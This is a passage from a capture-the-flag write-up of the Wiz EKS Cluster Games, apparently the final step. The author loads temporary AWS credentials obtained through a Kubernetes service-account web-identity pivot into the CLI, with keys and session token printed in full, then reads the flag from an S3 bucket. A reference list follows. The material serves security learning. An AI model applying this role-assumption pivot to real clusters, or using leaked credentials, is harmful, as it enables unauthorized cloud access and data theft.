    "SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:something",
        "Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/something"
    },
    "Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
    "Audience": "sts.amazonaws.com"
}

Next, we can authenticate using aws configure with the new credentials and retrieve the flag.

aws configure
AWS Access Key ID [None]: ASIA2AVYNEVM4L5OSGPW
AWS Secret Access Key [None]: fiUdOL1u6kYo2qqwDiV5/99W1mbwZ/L0y+XdGJpI
Default region name [None]: us-west-1
Default output format [None]:

echo "aws_session_token = IQoJb3JpZ2luX2VjEOz//////////wEaCXVzLXdlc3QtMSJIMEYCIQCk1qJGYAf5fic/6XZ08OeVmRPPnrfyftDQwH/mJE03kQIhAPhwKcHtbXSFambfgAIPGwSu+H+Ds6l7hCb1Bgt7jbJsKroECHUQABoMNjg4NjU1MjQ2NjgxIgw1sDbG9rHyXc/e3QoqlwRficlydMRZhiAt8DU4mBC3IXO87p3SqSCdzCs2qeic0A1Rx43+UN0IL0T0WiLpvHKo1+MCikStA0OuxGCuK+paBdmISQdw6XxxvMof+qzmyA/ntxajmkeYmAuqU2bx2jzHk8Q2wefD/1I+utp5BJLleGbVDxaO1kongQaLWjfFKwwJKdgos4PVey85BZoX24haobEcYSYfTZXtiuWpj3gU+Z+P4MA+c4aWsYZHxStE5XMGWf45Oki5gdsgiwznfvd+vBTWD8Zk17efJ0rGmADslPlfH0x29vqQgBSRg2+v1+JzXBehafZVgcobx910tNjy1EyKXuFIa4y2wtGPUNXrK8a9edoonePrqXQWJZzgphh8PXQsngGIbG1iTt4T78VzOYHWby9AyPpG5p/bVQ0l9ZAbag3rRYpBOyItWQvWRd2Jp+s3Zgv22Is8DZBOl7hUH5mshBQRWRjY9UUMeuSmWxyL617D3YaNmYRER6nn0EsLLd8LG863uLE5VYrGeuOSaZmvFIhmmxxLzyyr1uzngM3gr/LOt8ExKmHkQcAoDnX/JQts1Q9uuoNlc3Wr0OUZ18mWaVGg9RBHLc3uYbrk0CSZXItx7D/IJTiaJzZ/SHnFnw81AikUuk8e4cSGWhpagjIvqH9jS1NmMwuDHpcBs7sVO6qU5HQ5Oht75p3HOVq8Q0cvH/NPXW8iTN5NU9Zy9m5jJWZbMOrdpawGOpQBmiwUu2AW8lqnaI7sEGQvuUCJ/ACBRmEUj7j6rNMVVEH4S7kYOhcwbTLrHP4xoeFAk9hNHq29PIB3CHS0n7EOjkAgqwSFH7Bg2l3X+Z6JDOr07if0HeJPHkE1MwxILO03HooJHAiF7b/wBlMompCbZuf/po/e5lU2WL5pFcXO+GCAj3Qy6nlRR5RVx269ewK7qWefqQ==" >> .aws/credentials

aws sts get-caller-identity --profile default
{
    "UserId": "AROA2AVYNEVMZEZ2AFVYI:something",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/something"
}

Note that we need to pass --profile default because credentials from the earlier steps are already set in environment variables, and those take precedence if we don't specify a profile.
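Since environment variables take precedence, an alternative is to overwrite the stale credentials in the environment with the assumed-role ones, after which no --profile flag is needed. A sketch (the session token is truncated here; paste the full SessionToken value from the output above):

```shell
# Overwrite the old credentials in the environment with the assumed-role
# ones; env vars override any configured profile.
export AWS_ACCESS_KEY_ID="ASIA2AVYNEVM4L5OSGPW"
export AWS_SECRET_ACCESS_KEY="fiUdOL1u6kYo2qqwDiV5/99W1mbwZ/L0y+XdGJpI"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEOz..."  # full SessionToken value goes here

# Sanity check -- should now report the challengeEksS3Role ARN:
# aws sts get-caller-identity
```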

Retrieving the flag

aws s3api get-object --bucket challenge-flag-bucket-3ff1ae2 --key flag flag.txt --profile default  
{
    "AcceptRanges": "bytes",
    "LastModified": "2023-11-01T12:27:55+00:00",
    "ContentLength": 72,
    "ETag": "\"5479da5a2fc031f6a9941a0ed1e1bde9\"",
    "ContentType": "binary/octet-stream",
    "ServerSideEncryption": "AES256",
    "Metadata": {}
}

cat flag.txt 
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}

Reference:


https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/kubernetes-enumeration#get-current-privileges
https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/kubernetes-enumeration#get-secrets
https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/kubernetes-enumeration#get-pods
https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds#workflow-of-iam-role-for-service-accounts-1
https://www.wiz.io/blog/announcing-the-eks-cluster-games
https://www.wiz.io/blog/brokensesame-accidental-write-permissions-to-private-registry-allowed-potential-r
https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql
https://kubernetes.io/docs/reference/kubernetes-api/workload-resources/pod-v1/#containers
https://kubernetes.io/docs/concepts/containers/images/#specifying-imagepullsecrets-on-a-pod
https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md
https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane_auth_login.md#crane-auth-login
https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane_ls.md
https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane_pull.md
https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/
https://docs.aws.amazon.com/cli/latest/reference/ecr/
https://docs.aws.amazon.com/cli/latest/reference/ecr/describe-repositories.html
https://docs.aws.amazon.com/cli/latest/reference/ecr/get-authorization-token.html
https://docs.aws.amazon.com/cli/latest/reference/eks/
https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html
https://amod-kadam.medium.com/how-does-kubeconfig-works-with-aws-eks-get-token-8a19ff4c5814
https://stackoverflow.com/a/77407767
https://eksclustergames.com/finisher/amG1RJ0E